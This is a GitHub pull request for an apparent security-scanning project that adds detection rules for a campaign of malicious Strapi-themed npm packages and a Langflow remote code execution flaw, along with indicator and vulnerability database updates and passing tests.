Skip to content

chore(patterns): add SUP-029 Strapi npm malware + PSV-009 Langflow Agentic RCE [2026.04.06.1]#180

Merged
kurtpayne merged 1 commit intomainfrom
chore/pattern-update-20260406-0eac
Apr 6, 2026
Merged

chore(patterns): add SUP-029 Strapi npm malware + PSV-009 Langflow Agentic RCE [2026.04.06.1]#180
kurtpayne merged 1 commit intomainfrom
chore/pattern-update-20260406-0eac

Conversation

@kurtpayne
Copy link
Copy Markdown
Owner

@kurtpayne kurtpayne commented Apr 6, 2026

Summary

Two new detection rules, IOC enrichment, and vuln DB updates for rulepack 2026.04.06.1.

New Rules

ID Category Severity Title
SUP-029 supply_chain critical Malicious Strapi npm packages (Redis RCE / Credential Harvesting)
PSV-009 vulnerability critical Langflow Agentic Assistant RCE Vulnerability (CVE-2026-33873)

SUP-029 — Malicious Strapi npm packages

36 malicious npm packages disguised as Strapi CMS plugins were discovered in April 2026. These packages use postinstall scripts to exploit Redis and PostgreSQL, deploy reverse shells, harvest credentials, and drop persistent implants. The campaign specifically targeted a cryptocurrency payment platform (Guardarian).

Authors: umarbek1233, kekylf12, tikeqemif26, umar_bektembiev1

Sources:

PSV-009 — Langflow Agentic Assistant RCE (CVE-2026-33873)

A remote code execution flaw in Langflow Agentic Assistant allows attackers to execute LLM-generated Python code server-side, potentially leading to full system compromise. Fixed in 1.0.1.

Source: https://www.sentinelone.com/vulnerability-database/cve-2026-33873/

Other Changes

  • IOC DB: added 4 npm sock-puppet account domains from Strapi campaign
  • Vuln DB: added langflow 1.0.0 → CVE-2026-33873 (critical, fixed 1.0.1)
  • Showcases: 147_sup029_strapi_npm_malware, 148_psv009_langflow_agentic_rce
  • Tests: 4 new unit tests (all passing)

Test Results

All 116 tests pass ✅

@kurtpayne kurtpayne enabled auto-merge (squash) April 6, 2026 23:10
@kurtpayne kurtpayne force-pushed the chore/pattern-update-20260406-0eac branch from f534244 to 3cb73b0 Compare April 6, 2026 23:12
@kurtpayne
chore(patterns): add SUP-029 Strapi npm malware + PSV-009 Langflow Ag…
ba22ded 
…entic RCE [2026.04.06.1]

- SUP-029 (critical): 36 malicious npm packages disguised as Strapi CMS plugins
  deploying Redis RCE, credential harvesting, and persistent C2 implants via
  postinstall scripts. Authors: umarbek1233, kekylf12, tikeqemif26, umar_bektembiev1.
  Ref: https://thehackernews.com/2026/04/36-malicious-npm-packages-exploited.html

- PSV-009 (critical): Langflow Agentic Assistant RCE (CVE-2026-33873) — server-side
  execution of LLM-generated Python code, potentially leading to full system compromise.

- IOC DB: added 4 npm sock-puppet account domains from Strapi campaign
- Vuln DB: added langflow 1.0.0 → CVE-2026-33873 (critical, fixed 1.0.1)
- Showcases: 147_sup029_strapi_npm_malware, 148_psv009_langflow_agentic_rce
- Tests: test_sup029_strapi_npm_malware, test_psv009_langflow_agentic_rce (4 new tests)
@kurtpayne kurtpayne force-pushed the chore/pattern-update-20260406-0eac branch from 3cb73b0 to ba22ded Compare April 6, 2026 23:14
@kurtpayne kurtpayne merged commit 0037be1 into main Apr 6, 2026
15 checks passed
@codecov
Copy link
Copy Markdown

codecov bot commented Apr 6, 2026
edited
Loading

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 77.14%. Comparing base (e269b34) to head (ba22ded).
⚠️ Report is 1 commits behind head on main.

Additional details and impacted files 
@@           Coverage Diff           @@
##             main     #180   +/-   ##
=======================================
  Coverage   77.14%   77.14%           
=======================================
  Files          30       30           
  Lines        4095     4095           
=======================================
  Hits         3159     3159           
  Misses        936      936

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@kurtpayne kurtpayne deleted the chore/pattern-update-20260406-0eac branch April 6, 2026 23:23
kurtpayne added a commit to kurtpayne/skillscan-website that referenced this pull request Apr 6, 2026
@kurtpayne
chore(rules): sync rule table for rulepack 2026.04.06.1
cd34111 
- Add SUP-029: Malicious Strapi npm packages (Redis RCE / Credential Harvesting)
- Add PSV-009: Langflow Agentic Assistant RCE Vulnerability (CVE-2026-33873)
- Update SUP count: 28 → 29
- Update PSV count: 8 → 9
- Update ruleCount: 175 → 177
- Update rulepack version: 2026.04.05.1 → 2026.04.06.1

Paired with: kurtpayne/skillscan-security#180
@kurtpayne kurtpayne mentioned this pull request Apr 6, 2026
Merged
kurtpayne added a commit to kurtpayne/skillscan-website that referenced this pull request Apr 6, 2026
@kurtpayne
chore(rules): sync rule table for rulepack 2026.04.06.1 (#38)
f7e38ba 
- Add SUP-029: Malicious Strapi npm packages (Redis RCE / Credential Harvesting)
- Add PSV-009: Langflow Agentic Assistant RCE Vulnerability (CVE-2026-33873)
- Update SUP count: 28 → 29
- Update PSV count: 8 → 9
- Update ruleCount: 175 → 177
- Update rulepack version: 2026.04.05.1 → 2026.04.06.1

Paired with: kurtpayne/skillscan-security#180

Co-authored-by: kurtpayne <1012635+kurtpayne@users.noreply.github.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@kurtpayne